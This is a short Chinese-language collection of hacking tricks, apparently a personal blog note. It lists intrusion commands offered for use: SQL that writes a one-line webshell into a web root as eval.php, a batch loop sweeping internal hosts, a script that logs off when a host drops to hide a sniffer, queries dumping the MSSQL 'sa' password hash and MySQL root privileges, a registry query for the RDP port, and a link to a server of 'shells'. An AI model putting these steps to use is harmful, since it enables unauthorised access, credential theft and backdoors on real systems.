经常性的碰到一些小技巧的问题,做个记录。
ftp命令的妙用
ftp
open www.baidu.com 60000
终端超出限制
mstsc /console /admin /v:sebug.cn:3389
内网渗透的小命令
for /f %%i in (serv.txt) do ping %%i -n 1 | find "Pinging" >> res.txt
嗅探防掉线
echo off
:3
ping www.XXXX.com
if errorlevel 1 goto 1
if errorlevel 0 goto 0
:0
goto 3:
:1
logoff
mysql导出shell
Drop TABLE IF EXISTS temp; //如果存在temp就删掉
Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段
Insert INTO temp (cmd) VALUES(''); //把一句话木马插入到temp表
Select cmd from temp into out file 'F:/wwwroot/eval.php'; //查询temp表中的一句话并把结果导入到eval.php
Drop TABLE IF EXISTS temp; //删除temp(擦屁股o(∩_∩)o...)
各种shell
http://201.151.62.115:8080/shells/
MS SQLSERVER SA密码
select name,password from master.dbo.sysxlogins where name='sa'
Mysql密码
select file_priv from mysql.user where user='root';
cmd得终端端口
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber